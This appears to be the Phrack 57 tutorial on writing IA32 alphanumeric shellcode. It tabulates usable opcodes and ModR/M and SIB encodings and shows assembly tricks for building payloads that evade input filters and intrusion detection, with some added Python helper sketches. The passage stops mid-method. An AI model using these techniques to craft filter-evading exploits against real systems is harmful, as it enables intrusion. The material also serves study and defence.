Phrack 57 File 15: Writing ia32 alphanumeric shellcodes



                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x39, Phile #0x0f of 0x12

|=--------------=[ Writing ia32 alphanumeric shellcodes ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ rix@hert.org ]=---------------------------=|



----| Introduction


Today, more and more exploits need to be written in assembler,
particularly classical shellcodes (for buffer overflows, format string
attacks,...).

Many programs now perform powerful input filtering, using functions like
strspn() or strcspn(), which prevents people from easily inserting
shellcodes in their buffers.
In the same way, more and more IDSes detect suspicious opcode sequences,
some of which indicate the presence of a shellcode.

One way to evade such pattern matching techniques is to use polymorphic
code, generated with tools such as K2's ADMmutate.
Another way is presented here: we'll try to write IA32 shellcodes that
cannot be filtered, using only alphanumeric chars: more precisely, we'll
use only the chars '0'->'9', 'A'->'Z' and 'a'->'z'.
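
To make the constraint concrete, here is a minimal Python sketch of such
a filter. The helper name is_alphanumeric() is ours (it is not part of
asc.c); it only tells us whether a byte string is made exclusively of the
62 characters listed above.

```python
import string

# The 62 bytes allowed in an alphanumeric shellcode: '0'-'9', 'A'-'Z', 'a'-'z'.
ALNUM = frozenset((string.digits + string.ascii_letters).encode("ascii"))

def is_alphanumeric(data: bytes) -> bool:
    """Return True if every byte of data is an ASCII digit or letter."""
    return all(b in ALNUM for b in data)

if __name__ == "__main__":
    print(is_alphanumeric(b"haaaaX5aaaaH"))      # letters and digits only
    print(is_alphanumeric(b"\x31\xc0\xcd\x80"))  # xor eax,eax / int 0x80
```

Any shellcode we produce in the rest of this article should pass this
kind of check.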

If we can write such alphanumeric shellcodes, we will be able to store our
shellcodes nearly everywhere! Let's enumerate some interesting
possibilities:
- filtered inputs
- environment variables
- classical commands, instructions & parameters from usual protocols
- filenames & directories
- usernames & passwords
- ...



----| The usable instructions


Before beginning to think about particular techniques, let's first have a
look at the IA32 instructions that will be interesting for us.

First of all, some conventions (from Intel references) that we'll use in
our summary arrays:
 <r8>          : indicates a byte register.
 <r32>         : indicates a doubleword register.
 <r/m8>        : indicates a byte register or a byte from memory (through
                 a pointer).
 <r/m32>       : indicates a doubleword register or a doubleword from
                 memory (through a pointer).
 </r>          : indicates that the instruction byte is followed by
                 possibly several operand bytes. One of those bytes, the
                 "ModR/M byte", lets us specify the addressing form used,
                 with the help of 3 bit fields.

                     ModR/M byte:                 
                     
                    7 6 5 4 3 2 1 0 
                   +---+-----+-----+
                   |mod|  r  | r/m |
                   +---+-----+-----+
                   
                 In this case, the </r> tells us that the ModR/M byte will
                 contain a register operand and a register or memory
                 operand.
 <imm8>        : indicates an immediate byte value.
 <imm32>       : indicates an immediate doubleword value.
 <disp8>       : indicates a signed 8-bit displacement.
 <disp32>      : indicates a signed 32-bit displacement.
 <...>         : indicates that the instruction may need some operands
                 (possibly encoded on several operand bytes).


ALPHANUMERIC OPCODES:

Now, let's recall all the instructions with alphanumeric opcodes:

hexadecimal opcode | char | instruction                    | interesting
-------------------+------+--------------------------------+------------
30 </r>            | '0'  | xor <r/m8>,<r8>                | YES
31 </r>            | '1'  | xor <r/m32>,<r32>              | YES
32 </r>            | '2'  | xor <r8>,<r/m8>                | YES
33 </r>            | '3'  | xor <r32>,<r/m32>              | YES
34 <imm8>          | '4'  | xor al,<imm8>                  | YES
35 <imm32>         | '5'  | xor eax,<imm32>                | YES
36                 | '6'  | ss:   (Segment Override Prefix)|
37                 | '7'  | aaa                            |
38 </r>            | '8'  | cmp <r/m8>,<r8>                | YES
39 </r>            | '9'  | cmp <r/m32>,<r32>              | YES
                   |      |                                |
41                 | 'A'  | inc ecx                        | YES
42                 | 'B'  | inc edx                        | YES
43                 | 'C'  | inc ebx                        | YES
44                 | 'D'  | inc esp                        | YES
45                 | 'E'  | inc ebp                        | YES
46                 | 'F'  | inc esi                        | YES
47                 | 'G'  | inc edi                        | YES
48                 | 'H'  | dec eax                        | YES
49                 | 'I'  | dec ecx                        | YES
4A                 | 'J'  | dec edx                        | YES
4B                 | 'K'  | dec ebx                        | YES
4C                 | 'L'  | dec esp                        | YES
4D                 | 'M'  | dec ebp                        | YES
4E                 | 'N'  | dec esi                        | YES
4F                 | 'O'  | dec edi                        | YES
50                 | 'P'  | push eax                       | YES
51                 | 'Q'  | push ecx                       | YES
52                 | 'R'  | push edx                       | YES
53                 | 'S'  | push ebx                       | YES
54                 | 'T'  | push esp                       | YES
55                 | 'U'  | push ebp                       | YES
56                 | 'V'  | push esi                       | YES
57                 | 'W'  | push edi                       | YES
58                 | 'X'  | pop eax                        | YES
59                 | 'Y'  | pop ecx                        | YES
5A                 | 'Z'  | pop edx                        | YES
                   |      |                                |
61                 | 'a'  | popa                           | YES
62 <...>           | 'b'  | bound <...>                    |
63 <...>           | 'c'  | arpl <...>                     |
64                 | 'd'  | fs:   (Segment Override Prefix)|
65                 | 'e'  | gs:   (Segment Override Prefix)|
66                 | 'f'  | o16:    (Operand Size Override)| YES
67                 | 'g'  | a16:    (Address Size Override)|
68 <imm32>         | 'h'  | push <imm32>                   | YES
69 <...>           | 'i'  | imul <...>                     | 
6A <imm8>          | 'j'  | push <imm8>                    | YES
6B <...>           | 'k'  | imul <...>                     |
6C <...>           | 'l'  | insb <...>                     |
6D <...>           | 'm'  | insd <...>                     |
6E <...>           | 'n'  | outsb <...>                    |
6F <...>           | 'o'  | outsd <...>                    |
70 <disp8>         | 'p'  | jo <disp8>                     | YES
71 <disp8>         | 'q'  | jno <disp8>                    | YES
72 <disp8>         | 'r'  | jb <disp8>                     | YES
73 <disp8>         | 's'  | jae <disp8>                    | YES
74 <disp8>         | 't'  | je <disp8>                     | YES
75 <disp8>         | 'u'  | jne <disp8>                    | YES
76 <disp8>         | 'v'  | jbe <disp8>                    | YES
77 <disp8>         | 'w'  | ja <disp8>                     | YES
78 <disp8>         | 'x'  | js <disp8>                     | YES
79 <disp8>         | 'y'  | jns <disp8>                    | YES
7A <disp8>         | 'z'  | jp <disp8>                     | YES

What can we directly deduce from all this?

- NO "MOV" INSTRUCTIONS:
 => we need to find another way to manipulate our data.
- NO INTERESTING ARITHMETIC INSTRUCTIONS ("ADD","SUB",...):
 => we can only use DEC and INC.
 => we can't use INC with the EAX register.
- THE "XOR" INSTRUCTION:
 => we can use XOR with bytes and doublewords.
 => very interesting for basic crypto stuff. 
- "PUSH"/"POP"/"POPAD" INSTRUCTIONS:
 => we can push bytes and doublewords directly on the stack.
 => we can only use POP with the EAX,ECX and EDX registers.
 => it seems we're going to play again with the stack.
- THE "O16" OPERAND SIZE OVERRIDE:
 => we can also achieve 16 bits manipulations with this instruction
    prefix.
- "Jcc" (CONDITIONAL SHORT JUMP) AND "CMP" INSTRUCTIONS:
 => we can perform some comparisons and branch on their result.
 => we can't directly use constant values with CMP.


Besides, don't forget that the operands of these instructions (</r>,
<imm8>, <imm32>, <disp8> and <disp32>) must also remain alphanumeric. This
makes our task even more complicated...


THE "ModR/M" BYTE:

For example, let's observe the effect of this supplementary constraint on
the ModR/M byte (</r>), particularly for XOR and CMP.
In the next array, we'll find all the possible values for this ModR/M
byte, and their interpretation as <r8>/<r32> (first row) and <r/m> (first
column) operands.

           <r8>:|  al  |  cl  |  dl  |  bl  |  ah  |  ch  |  dh  |  bh 
          <r32>:| eax  | ecx  | edx  | ebx  | esp  | ebp  | esi  | edi
<r/m>           |      |      |      |      |      |      |      |
--:-------------+------+------+------+------+------+------+------+------
(mod=00)        |      |      |      |      |      |      |      |
[eax]           |00    |08    |10    |18    |20    |28    |30 '0'|38 '8'
[ecx]           |01    |09    |11    |19    |21    |29    |31 '1'|39 '9'
[edx]           |02    |0A    |12    |1A    |22    |2A    |32 '2'|3A
[ebx]           |03    |0B    |13    |1B    |23    |2B    |33 '3'|3B
[<SIB>]         |04    |0C    |14    |1C    |24    |2C    |34 '4'|3C
[<disp32>]      |05    |0D    |15    |1D    |25    |2D    |35 '5'|3D
[esi]           |06    |0E    |16    |1E    |26    |2E    |36 '6'|3E
[edi]           |07    |0F    |17    |1F    |27    |2F    |37 '7'|3F
----------------+------+------+------+------+------+------+------+------
(mod=01)        |      |      |      |      |      |      |      |
[eax+<disp8>]   |40    |48 'H'|50 'P'|58 'X'|60    |68 'h'|70 'p'|78 'x'
[ecx+<disp8>]   |41 'A'|49 'I'|51 'Q'|59 'Y'|61 'a'|69 'i'|71 'q'|79 'y'
[edx+<disp8>]   |42 'B'|4A 'J'|52 'R'|5A 'Z'|62 'b'|6A 'j'|72 'r'|7A 'z'
[ebx+<disp8>]   |43 'C'|4B 'K'|53 'S'|5B    |63 'c'|6B 'k'|73 's'|7B
[<SIB>+<disp8>] |44 'D'|4C 'L'|54 'T'|5C    |64 'd'|6C 'l'|74 't'|7C
[ebp+<disp8>]   |45 'E'|4D 'M'|55 'U'|5D    |65 'e'|6D 'm'|75 'u'|7D
[esi+<disp8>]   |46 'F'|4E 'N'|56 'V'|5E    |66 'f'|6E 'n'|76 'v'|7E
[edi+<disp8>]   |47 'G'|4F 'O'|57 'W'|5F    |67 'g'|6F 'o'|77 'w'|7F
----------------+------+------+------+------+------+------+------+------
(mod=10)        |      |      |      |      |      |      |      |
[eax+<disp32>]  |80    |88    |90    |98    |A0    |A8    |B0    |B8
[ecx+<disp32>]  |81    |89    |91    |99    |A1    |A9    |B1    |B9
[edx+<disp32>]  |82    |8A    |92    |9A    |A2    |AA    |B2    |BA
[ebx+<disp32>]  |83    |8B    |93    |9B    |A3    |AB    |B3    |BB
[<SIB>+<disp32>]|84    |8C    |94    |9C    |A4    |AC    |B4    |BC
[ebp+<disp32>]  |85    |8D    |95    |9D    |A5    |AD    |B5    |BD
[esi+<disp32>]  |86    |8E    |96    |9E    |A6    |AE    |B6    |BE
[edi+<disp32>]  |87    |8F    |97    |9F    |A7    |AF    |B7    |BF
---+------------+------+------+------+------+------+------+------+------
(mod=11)        |      |      |      |      |      |      |      |
al | eax        |C0    |C8    |D0    |D8    |E0    |E8    |F0    |F8
cl | ecx        |C1    |C9    |D1    |D9    |E1    |E9    |F1    |F9
dl | edx        |C2    |CA    |D2    |DA    |E2    |EA    |F2    |FA
bl | ebx        |C3    |CB    |D3    |DB    |E3    |EB    |F3    |FB
ah | esp        |C4    |CC    |D4    |DC    |E4    |EC    |F4    |FC
ch | ebp        |C5    |CD    |D5    |DD    |E5    |ED    |F5    |FD
dh | esi        |C6    |CE    |D6    |DE    |E6    |EE    |F6    |FE
bh | edi        |C7    |CF    |D7    |DF    |E7    |EF    |F7    |FF

What can we deduce this time for XOR and CMP?

- SOME "xor [<r32>],dh" AND "xor [<r32>],bh" INSTRUCTIONS.
- THE "xor [<disp32>],dh" INSTRUCTION.
- SOME "xor [<r32>+<disp8>],<r8>" INSTRUCTIONS.
- NO "xor <r8>,<r8>" INSTRUCTIONS.

- SOME "xor [<r32>],esi" AND "xor [<r32>],edi" INSTRUCTIONS.
- THE "xor [<disp32>],esi" INSTRUCTION.
- SOME "xor [<r32>+<disp8>],<r32>" INSTRUCTIONS.
- NO "xor <r32>,<r32>" INSTRUCTIONS.

- SOME "xor dh,[<r32>]" AND "xor bh,[<r32>]" INSTRUCTIONS.
- THE "xor dh,[<disp32>]" INSTRUCTION.
- SOME "xor <r8>,[<r32>+<disp8>]" INSTRUCTIONS.

- SOME "xor esi,[<r32>]" AND "xor edi,[<r32>]" INSTRUCTIONS.
- THE "xor esi,[<disp32>]" INSTRUCTION.
- SOME "xor <r32>,[<r32>+<disp8>]" INSTRUCTIONS.

- SOME "cmp [<r32>],dh" AND "cmp [<r32>],bh" INSTRUCTIONS.
- THE "cmp [<disp32>],dh" INSTRUCTION.
- SOME "cmp [<r32>+<disp8>],<r8>" INSTRUCTIONS.
- NO "cmp <r8>,<r8>" INSTRUCTIONS.

- SOME "cmp [<r32>],esi" AND "cmp [<r32>],edi" INSTRUCTIONS.
- THE "cmp [<disp32>],esi" INSTRUCTION.
- SOME "cmp [<r32>+<disp8>],<r32>" INSTRUCTIONS.
- NO "cmp <r32>,<r32>" INSTRUCTIONS.
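
These deductions follow directly from the bit layout of the ModR/M byte.
As a rough check, the Python sketch below (helper names are ours) splits
every alphanumeric byte into its mod/r/rm fields and groups the register
fields by addressing mode.

```python
import string

ALNUM = frozenset((string.digits + string.ascii_letters).encode("ascii"))

def split_modrm(byte: int) -> tuple:
    """Split a ModR/M byte into its (mod, r, r/m) bit fields."""
    return byte >> 6, (byte >> 3) & 7, byte & 7

def alnum_modrm_by_mod() -> dict:
    """Group alphanumeric ModR/M bytes as {mod: set of r field values}."""
    groups = {}
    for byte in sorted(ALNUM):
        mod, reg, _rm = split_modrm(byte)
        groups.setdefault(mod, set()).add(reg)
    return groups

if __name__ == "__main__":
    for mod, regs in alnum_modrm_by_mod().items():
        print(f"mod={mod:02b}: r fields {sorted(regs)}")
```

Only mod=00 and mod=01 show up: mod=11 (register to register) is never
alphanumeric, and with mod=00 the register field is limited to 6 and 7
(dh/bh or esi/edi).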


THE "SIB" BYTE:

To be complete, we must also analyze possibilities offered by the Scale
Index Base byte ("<SIB>" in our last array). This SIB byte allows us to
create addresses having the following form:
 <SIB> = <base>+(2^<scale>)*<index>
Where:
 <base>  : indicates a base register.
 <index> : indicates an index register.
 <scale> : indicates a scale factor for the index register.

Here are the different bit fields of this byte:

  7 6 5 4 3 2 1 0 
 +---+-----+-----+
 |sc.|index|base |
 +---+-----+-----+

Let's have a look at this last array:

    <base>:| eax  | ecx  | edx  | ebx  | esp  | ebp  | esi  | edi
           |      |      |      |      |      | (if  |      |
(2^<scale>)|      |      |      |      |      |  MOD |      |
*<index>   |      |      |      |      |      | !=00)|      |
----:------+------+------+------+------+------+------+------+------
eax        |00    |01    |02    |03    |04    |05    |06    |07
ecx        |08    |09    |0A    |0B    |0C    |0D    |0E    |0F
edx        |10    |11    |12    |13    |14    |15    |16    |17
ebx        |18    |19    |1A    |1B    |1C    |1D    |1E    |1F
0          |20    |21    |22    |23    |24    |25    |26    |27
ebp        |28    |29    |2A    |2B    |2C    |2D    |2E    |2F
esi        |30 '0'|31 '1'|32 '2'|33 '3'|34 '4'|35 '5'|36 '6'|37 '7'
edi        |38 '8'|39 '9'|3A    |3B    |3C    |3D    |3E    |3F
-----------+------+------+------+------+------+------+------+------
2*eax      |40    |41 'A'|42 'B'|43 'C'|44 'D'|45 'E'|46 'F'|47 'G'
2*ecx      |48 'H'|49 'I'|4A 'J'|4B 'K'|4C 'L'|4D 'M'|4E 'N'|4F 'O'
2*edx      |50 'P'|51 'Q'|52 'R'|53 'S'|54 'T'|55 'U'|56 'V'|57 'W'
2*ebx      |58 'X'|59 'Y'|5A 'Z'|5B    |5C    |5D    |5E    |5F
0          |60    |61 'a'|62 'b'|63 'c'|64 'd'|65 'e'|66 'f'|67 'g'
2*ebp      |68 'h'|69 'i'|6A 'j'|6B 'k'|6C 'l'|6D 'm'|6E 'n'|6F 'o'
2*esi      |70 'p'|71 'q'|72 'r'|73 's'|74 't'|75 'u'|76 'v'|77 'w'
2*edi      |78 'x'|79 'y'|7A 'z'|7B    |7C    |7D    |7E    |7F
-----------+------+------+------+------+------+------+------+------
4*eax      |80    |81    |82    |83    |84    |85    |86    |87
4*ecx      |88    |89    |8A    |8B    |8C    |8D    |8E    |8F
4*edx      |90    |91    |92    |93    |94    |95    |96    |97
4*ebx      |98    |99    |9A    |9B    |9C    |9D    |9E    |9F
0          |A0    |A1    |A2    |A3    |A4    |A5    |A6    |A7
4*ebp      |A8    |A9    |AA    |AB    |AC    |AD    |AE    |AF
4*esi      |B0    |B1    |B2    |B3    |B4    |B5    |B6    |B7
4*edi      |B8    |B9    |BA    |BB    |BC    |BD    |BE    |BF
-----------+------+------+------+------+------+------+------+------
8*eax      |C0    |C1    |C2    |C3    |C4    |C5    |C6    |C7
8*ecx      |C8    |C9    |CA    |CB    |CC    |CD    |CE    |CF
8*edx      |D0    |D1    |D2    |D3    |D4    |D5    |D6    |D7
8*ebx      |D8    |D9    |DA    |DB    |DC    |DD    |DE    |DF
0          |E0    |E1    |E2    |E3    |E4    |E5    |E6    |E7
8*ebp      |E8    |E9    |EA    |EB    |EC    |ED    |EE    |EF
8*esi      |F0    |F1    |F2    |F3    |F4    |F5    |F6    |F7
8*edi      |F8    |F9    |FA    |FB    |FC    |FD    |FE    |FF
-----------+------+------+------+------+------+------+------+------
(if <base> |
   ==ebp   | => <SIB> = <disp32>+(2^<scale>)*<index>
and MOD==0)|
-----------+-------------------------------------------------------

What can we deduce from this last array?
- SOME "<r32>+esi" AND "<r32>+edi" SIB ADDRESSES.
- SOME "<r32>+2*<r32>" SIB ADDRESSES.
- NO "<r32>+4*<r32>" OR "<r32>+8*<r32>" SIB ADDRESSES.
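
The same kind of check works for the SIB byte. This Python sketch (the
function names are ours) decodes a SIB byte into readable form and
collects the scale factors that an alphanumeric SIB byte can express.

```python
import string

ALNUM = frozenset((string.digits + string.ascii_letters).encode("ascii"))
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def describe_sib(byte: int, mod: int = 1) -> str:
    """Render a SIB byte as '<base>+<factor>*<index>' text."""
    scale, index, base = byte >> 6, (byte >> 3) & 7, byte & 7
    # base=101 with mod=00 means "disp32 instead of a base register".
    base_txt = "disp32" if (base == 5 and mod == 0) else REGS[base]
    if index == 4:                 # index=100 means "no index register"
        return base_txt
    factor = 1 << scale
    idx_txt = REGS[index] if factor == 1 else f"{factor}*{REGS[index]}"
    return f"{base_txt}+{idx_txt}"

def alnum_scales() -> set:
    """Scale factors reachable with an alphanumeric SIB byte."""
    return {1 << (b >> 6) for b in ALNUM}

if __name__ == "__main__":
    print(describe_sib(0x6B))      # the 'k' cell of the table
    print(sorted(alnum_scales()))
```

Since every alphanumeric byte is below 0x80, the two scale bits can only
be 00 or 01, hence the absence of 4* and 8* addresses.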


Also remember that the usual byte order for a full instruction with
an optional ModR/M byte, SIB byte and disp8/disp32 is:
 <opcode> [<ModR/M>] [<SIB>] [<disp8>/<disp32>]


THE "XOR" INSTRUCTION:

We notice that we have some possibilities for the XOR instruction. Let's
briefly recall all possible logical combinations:

a | b | a XOR b (=c)
--+---+-------------
0 | 0 |    0
0 | 1 |    1
1 | 0 |    1
1 | 1 |    0

What can we deduce from this?
-  a XOR a = 0
 => we can easily initialize registers to 0.
-  0 XOR b = b
 => we can easily load values in registers containing 0.
-  1 XOR b = NOT b
 => we can easily invert values using registers containing 0xFFFFFFFF.
-  a XOR b = c
   b XOR c = a
   a XOR c = b
 => we can easily find a byte's XOR complement.
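
As an illustration of the last point, here is a small Python sketch that
searches for a pair of alphanumeric bytes whose XOR gives a wanted byte.
It is not the asc.c routine (which, as described later, picks random
values): xor_complement() is our own name, and it simply returns the
first pair found in ascending order.

```python
import string

ALNUM = sorted((string.digits + string.ascii_letters).encode("ascii"))
ALNUM_SET = frozenset(ALNUM)

def xor_complement(target: int):
    """Return alphanumeric bytes (x, y) with x ^ y == target, or None."""
    for x in ALNUM:
        y = x ^ target
        if y in ALNUM_SET:
            return x, y
    return None

if __name__ == "__main__":
    print(xor_complement(0x0B))    # a non-alphanumeric byte below 0x80
    print(xor_complement(0x80))    # bit 7 set: impossible with XOR alone
```

Because no alphanumeric byte has bit 7 set, a byte of 0x80 or more can
never be obtained this way; this is where the NOT trick becomes useful.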



----| Classic manipulations


Now, we are going to see various methods that let us perform as many
usual low-level manipulations as possible with the authorized
instructions listed above.


INITIALIZING REGISTERS WITH PARTICULAR VALUES:

First of all, let's think about a method allowing us to initialize some
very useful particular values in our registers, like 0 or 0xFFFFFFFF
(see alphanumeric_initialize_registers() in asc.c).
For example:

 push 'aaaa'                      ; 'a' 'a' 'a' 'a'
 pop eax                          ;EAX now contains 'aaaa'.
 xor eax,'aaaa'                   ;EAX now contains 0.

 dec eax                          ;EAX now contains 0xFFFFFFFF.

We are going to memorize those special values in particular registers, to
be able to use them easily.
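
A quick way to convince ourselves is to emulate these four instructions.
The Python sketch below is only a model (run_init() and CODE are our own
names); it reproduces the 32-bit arithmetic and spells out the machine
code, using the opcodes from the table above (68 = push imm32, 58 = pop
eax, 35 = xor eax,imm32, 48 = dec eax).

```python
MASK32 = 0xFFFFFFFF

def run_init() -> int:
    """Emulate: push 'aaaa' / pop eax / xor eax,'aaaa' / dec eax."""
    imm = int.from_bytes(b"aaaa", "little")
    stack = [imm]                  # push 'aaaa'
    eax = stack.pop()              # pop eax
    eax ^= imm                     # xor eax,'aaaa'  -> 0
    eax = (eax - 1) & MASK32       # dec eax         -> wraps around
    return eax

# Machine code of the four instructions, byte for byte.
CODE = b"h" + b"aaaa" + b"X" + b"5" + b"aaaa" + b"H"

if __name__ == "__main__":
    print(hex(run_init()), CODE.decode("ascii"))
```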


INITIALIZING ALL REGISTERS:

At the beginning of our shellcode, we will need to initialize several
registers with values that we will probably use later.
Don't forget that we can't use POP with all registers (only EAX, ECX and
EDX). We will therefore use POPAD. For example, if we suppose EAX contains
0 and ECX contains 'aaaa', we can initialize all our registers easily:

 push eax                         ;EAX will contain 0 after POPAD.
 push ecx                         ;no change to ECX ('aaaa').
 push esp                         ;EDX will contain ESP after POPAD.
 push eax                         ;EBX will contain 0.
 push esp                         ;no change to ESP.
 push ebp                         ;no change to EBP.
 push ecx                         ;ESI will contain 'aaaa' after POPAD.
 dec eax                          ;EAX now contains 0xFFFFFFFF.
 push eax                         ;EDI will contain 0xFFFFFFFF.
 popad                            ;we get all values from the stack.
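
To follow what ends up where, we can replay this sequence on a tiny
model of the CPU. The Python sketch below is an assumption-laden toy
(the Cpu class and init_all() are ours): it only knows PUSH, DEC and
POPAD, and relies on two documented behaviours: PUSH ESP stores the
value ESP had before the push, and POPAD discards the ESP slot.

```python
MASK32 = 0xFFFFFFFF
# POPAD pops in this order; the ESP slot is read and thrown away.
POPAD_ORDER = ["edi", "esi", "ebp", "esp", "ebx", "edx", "ecx", "eax"]

class Cpu:
    """Tiny model of the registers plus a stack that grows downwards."""
    def __init__(self, **regs):
        self.r = {name: 0 for name in POPAD_ORDER}
        self.r.update(regs)
        self.mem = {}                      # address -> 32-bit value

    def push(self, reg):
        value = self.r[reg]                # PUSH ESP stores the old ESP
        self.r["esp"] = (self.r["esp"] - 4) & MASK32
        self.mem[self.r["esp"]] = value

    def dec(self, reg):
        self.r[reg] = (self.r[reg] - 1) & MASK32

    def popad(self):
        for reg in POPAD_ORDER:
            value = self.mem[self.r["esp"]]
            self.r["esp"] = (self.r["esp"] + 4) & MASK32
            if reg != "esp":               # ESP itself is not restored
                self.r[reg] = value

def init_all(cpu):
    """Replay the listing above (EAX = 0 and ECX = 'aaaa' on entry)."""
    for reg in ["eax", "ecx", "esp", "eax", "esp", "ebp", "ecx"]:
        cpu.push(reg)
    cpu.dec("eax")
    cpu.push("eax")
    cpu.popad()
    return cpu.r

if __name__ == "__main__":
    aaaa = int.from_bytes(b"aaaa", "little")
    # esp and ebp are arbitrary illustrative values.
    regs = init_all(Cpu(eax=0, ecx=aaaa, esp=0x1000, ebp=0x2000))
    for name in ["eax", "ecx", "edx", "ebx", "ebp", "esi", "edi"]:
        print(f"{name} = {regs[name]:#010x}")
```

In this model EDX receives the value ESP had after the first two pushes,
not its value at the start of the sequence.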


COPYING FROM REGISTERS TO REGISTERS:

Using POPAD, we can also copy data from any register to any register, if
we can't PUSH/POP directly. For example, copying EAX to EBX:

 push eax                         ;no change.
 push ecx                         ;no change.
 push edx                         ;no change.
 push eax                         ;EBX will contain EAX after POPAD.
 push eax                         ;no change (ESP not "popped").
 push ebp                         ;no change.
 push esi                         ;no change.
 push edi                         ;no change.
 popad

Note that ESP changes with every PUSH, so a pushed ESP no longer holds the
value it had before the sequence. This does not matter for the ESP slot,
because POPAD pops all registers except ESP from the stack.
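
The same pattern works for any pair of registers, so it can be generated
automatically. Here is a minimal Python sketch (copy_register() is our
own helper, not an asc.c function) that emits the alphanumeric bytes for
such a copy. Unlike the listing above, it pushes ESP itself in the ESP
slot; since that slot is discarded, both choices are equivalent.

```python
# Registers in the order PUSHAD would push them.
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
PUSH_BASE = 0x50    # 'P'..'W' = push eax..push edi
POPAD = 0x61        # 'a'

def copy_register(src: str, dst: str) -> bytes:
    """Alphanumeric code copying register src into dst through POPAD."""
    if dst == "esp":
        raise ValueError("POPAD never reloads ESP")
    code = bytearray()
    for slot in REGS:
        # Every slot gets its own register back, except dst which gets src.
        source = src if slot == dst else slot
        code.append(PUSH_BASE + REGS.index(source))
    code.append(POPAD)
    return bytes(code)

if __name__ == "__main__":
    print(copy_register("eax", "ebx").decode("ascii"))
```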


SIMULATING A "NOT" INSTRUCTION:

By using XOR, we can easily implement a classical NOT instruction. Suppose
EAX contains the value we want to invert, and EDI contains 0xFFFFFFFF:

 push eax                         ;we push the value we want to invert.
 push esp                         ;we push the offset of the value we
                                  ; pushed on the stack.
 pop ecx                          ;ECX now contains this offset.
 xor [ecx],edi                    ;we invert the value.
 pop eax                          ;we get it back in EAX.
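
Both the arithmetic and the encoding are easy to verify. In the Python
sketch below (names are ours), not_via_xor() models what the XOR with
EDI computes, and CODE lists the six bytes of the sequence, taken from
the opcode and ModR/M tables above.

```python
MASK32 = 0xFFFFFFFF

def not_via_xor(value: int, all_ones: int = MASK32) -> int:
    """What 'xor [ecx],edi' computes when EDI holds 0xFFFFFFFF."""
    return (value ^ all_ones) & MASK32

# push eax / push esp / pop ecx / xor [ecx],edi / pop eax
CODE = bytes([0x50, 0x54, 0x59, 0x31, 0x39, 0x58])

if __name__ == "__main__":
    print(hex(not_via_xor(0x12345678)), CODE.decode("ascii"))
```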


READING BYTES FROM MEMORY TO A REGISTER:

Once again, by using XOR and the 0 value (here in EAX), we can read an
arbitrary byte into DH:

 push eax                         ;we push 0 on the stack.
 pop edx                          ;we get it back in EDX (DH is now 0).
 xor dh,[esi]                     ;we read our byte using [esi] as source
                                  ;address.

We can also read values not far from [esp] on the stack, by using DEC/INC
on ESP, and then using a classical POP.


WRITING ALPHANUMERIC BYTES TO MEMORY:

If we need a small place to write bytes, we can simply PUSH them, writing
towards decreasing memory addresses, and use INC on ESP to skip the
filler bytes we don't want.

 push 'cdef'                      ;                 'c' 'd' 'e' 'f'
 push 'XXab'                      ; 'X' 'X' 'a' 'b' 'c' 'd' 'e' 'f'
 inc esp                          ;     'X' 'a' 'b' 'c' 'd' 'e' 'f'
 inc esp                          ;         'a' 'b' 'c' 'd' 'e' 'f'

Now, ESP points at an "abcdef" string written on the stack...
We can also use the O16 instruction prefix to directly push a 16-bit
value:

 push 'cdef'                      ;         'c' 'd' 'e' 'f'
 push 'ab'                        ; 'a' 'b' 'c' 'd' 'e' 'f'
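
Both variants can be replayed on a byte-level model of the stack. The
Python sketch below is only a toy (the Stack class is ours); it assumes
that a quoted constant such as 'cdef' lands in memory in the order it is
written, which is how NASM treats character constants.

```python
class Stack:
    """Byte-addressable stack growing towards lower addresses."""
    def __init__(self, size: int = 32):
        self.mem = bytearray(size)
        self.esp = size

    def push(self, data: bytes):
        # data is given in memory order, lowest address first.
        self.esp -= len(data)
        self.mem[self.esp:self.esp + len(data)] = data

    def inc_esp(self):
        self.esp += 1

    def top(self, count: int) -> bytes:
        return bytes(self.mem[self.esp:self.esp + count])

def with_padding() -> bytes:
    s = Stack()
    s.push(b"cdef")       # push 'cdef'
    s.push(b"XXab")       # push 'XXab'
    s.inc_esp()           # inc esp
    s.inc_esp()           # inc esp
    return s.top(6)

def with_o16() -> bytes:
    s = Stack()
    s.push(b"cdef")       # push 'cdef'
    s.push(b"ab")         # o16 push 'ab'
    return s.top(6)

if __name__ == "__main__":
    print(with_padding(), with_o16())
```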



----| The methods


Now, let's combine some of these interesting manipulations to effectively
generate alphanumeric shellcodes.
We are going to generate an alphanumeric engine that will build our
original (non-alphanumeric) shellcode. We propose 2 different
techniques:


USING THE STACK:

Because we have a set of instructions related to the stack, we are going
to use them efficiently.
In fact, we are going to construct our original code gradually while
pushing values on the stack, from the last byte (B1) of our original
shellcode to the first one (see alphanumeric_stack_generate() and
"-m stack" option in asc.c):

 .... 00  00  00  00  00  00  00  00  00  00  00  00  SS  SS  SS  SS ....

 .... 00  00  00  00  00  00  00  00  00  00  B2  B1  SS  SS  SS  SS ....
                                              <-----
 .... 00  00  00  00  00  00  00  B5  B4  B3  B2  B1  SS  SS  SS  SS ....
                                  <-----------------
 .... 00  00  00  B9  B8  B7  B6  B5  B4  B3  B2  B1  SS  SS  SS  SS ....
                  <-------original shellcode--------

Where: SS represents bytes already present on the stack.
       00 represents non used bytes on the stack.
       Bx represents bytes of our original non-alphanumeric shellcode.

It is really easy, because we have instructions to push doublewords or
words, and we can also play with INC ESP to push a single byte.
The problem is that we cannot directly push non-alphanumeric bytes. Let's
therefore classify the bytes of our original code into different
categories (see alphanumeric_stack_get_category() in asc.c).
We can then write tiny blocks of 1, 2, 3 or 4 bytes from the same category
on the stack (see alphanumeric_stack_generate_push() in asc.c).
Let's see how to do that:

- CATEGORY_00:
 We suppose the register (<r>,<r32>,<r16>) contains the 0xFFFFFFFF value.
 
  1 BYTE:
   inc <r32>                      ;<r32> now contains 0.
   push <r16>                     ; 00  00
   inc esp                        ;     00
   dec <r32>                      ;<r32> now contains 0xFFFFFFFF.
   
  2 BYTES:
   inc <r32>                      ;<r32> now contains 0.
   push <r16>                     ; 00  00
   dec <r32>                      ;<r32> now contains 0xFFFFFFFF.   

  3 BYTES:
   inc <r32>                      ;<r32> now contains 0.
   push <r32>                     ; 00  00  00  00
   inc esp                        ;     00  00  00
   dec <r32>                      ;<r32> now contains 0xFFFFFFFF.      

  4 BYTES:
   inc <r32>                      ;<r32> now contains 0.
   push <r32>                     ; 00  00  00  00
   dec <r32>                      ;<r32> now contains 0xFFFFFFFF.      

- CATEGORY_FF:
